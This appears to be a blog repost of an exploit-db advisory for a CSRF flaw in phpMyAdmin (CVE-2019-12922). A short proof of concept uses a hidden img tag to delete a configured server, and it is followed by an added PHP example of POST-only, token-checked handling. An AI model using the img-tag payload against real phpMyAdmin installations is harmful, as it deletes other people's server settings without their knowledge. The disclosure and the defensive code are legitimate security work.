Koray

phpMyAdmin vulnerability (CVE-2019-12922)


phpMyAdmin is a free software tool written in PHP, intended to handle the
administration of MySQL over the Web. phpMyAdmin supports a wide range of
operations on MySQL and MariaDB.

A Cross-Site Request Forgery has been detected in phpMyAdmin that allows
an attacker to trigger a CSRF attack against a phpMyAdmin user, deleting any
server in the Setup page.

PROOF OF CONCEPT
-------------------------
Exploit CSRF - Deleting main server

<p>Deleting Server 1</p>
<img src="http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1" style="display:none;" />

BUSINESS IMPACT
-------------------------
The attacker can easily create a fake hyperlink containing the request they
want to execute on behalf of the user, in this way making a CSRF attack
possible due to the wrong use of the HTTP method.

SYSTEMS AFFECTED
-------------------------
phpMyAdmin <= 4.9.0.1

SOLUTION
-------------------------
Implement in each call the validation of the token variable, as already
done in other phpMyAdmin requests.


Source: https://www.exploit-db.com/exploits/47385

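The advisory's SOLUTION section asks for token validation on every call, and its BUSINESS IMPACT section points at the root cause: a state-changing action reachable by plain GET. The handler below is an added illustration written for this post; it is not phpMyAdmin's code and not part of the exploit-db advisory. The function names (`getCsrfToken`, `validateStateChangingRequest`, `removeServerHandler`), the `$session`/`$servers` arrays and the `token` field name are assumptions made for the example. It shows the two defensive checks together: refuse anything but POST for the remove action (the PoC's hidden `<img>` can only issue GET), and compare a per-session random token in constant time before touching the server list.

```php
<?php
// Added example, not phpMyAdmin's code: a hardened "remove server" handler.
// Names and data layout are assumptions for illustration only.
declare(strict_types=1);

// Issue (or reuse) a random anti-CSRF token bound to the user's session.
// A cross-site attacker can make the browser send cookies, but cannot read
// the page that carries this token, so they cannot supply it.
function getCsrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Check a state-changing request. Returns null when it may proceed, or a
// short reason string when it must be rejected.
function validateStateChangingRequest(array $session, string $method, array $post): ?string
{
    // 1. The PoC is a GET issued by an <img> tag; state changes must be POST.
    if ($method !== 'POST') {
        return 'state-changing action requires POST';
    }
    // 2. The token must come from the request body and match the session.
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['token'] ?? '';
    if ($expected === '' || !is_string($given) || $given === '') {
        return 'missing anti-CSRF token';
    }
    // hash_equals compares in constant time, so timing does not leak the token.
    if (!hash_equals($expected, $given)) {
        return 'invalid anti-CSRF token';
    }
    return null;
}

// The action itself: the delete is only reached after both checks pass.
function removeServerHandler(array $session, string $method, array $post, array &$servers): string
{
    $err = validateStateChangingRequest($session, $method, $post);
    if ($err !== null) {
        return "403 Forbidden: $err";
    }
    $id = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT);
    if ($id === false || !isset($servers[$id])) {
        return '404 Not Found: no such server';
    }
    unset($servers[$id]);
    return "200 OK: server $id removed";
}

// --- constructed demonstration data ---
$session = [];
$servers = [1 => ['host' => 'localhost'], 2 => ['host' => 'db2.example']];
$token   = getCsrfToken($session);   // what the legitimate setup page would embed

// Request shaped like the PoC: GET, no token. Rejected before any deletion.
echo removeServerHandler($session, 'GET', ['page' => 'servers', 'mode' => 'remove', 'id' => '1'], $servers), PHP_EOL;

// POST with a guessed token: rejected by the constant-time comparison.
echo removeServerHandler($session, 'POST', ['id' => '1', 'token' => 'deadbeef'], $servers), PHP_EOL;

// Legitimate POST carrying the session's token: the server is removed.
echo removeServerHandler($session, 'POST', ['id' => '1', 'token' => $token], $servers), PHP_EOL;
```

The token must be carried in the form body, never in a cookie (the browser would attach it automatically, defeating the check) and never only in the query string (it then ends up in logs and Referer headers). Marking the session cookie `SameSite=Lax` or `Strict` is a useful second layer, but it does not replace the per-request token, since the affected setup page also has to serve older browsers and non-browser clients.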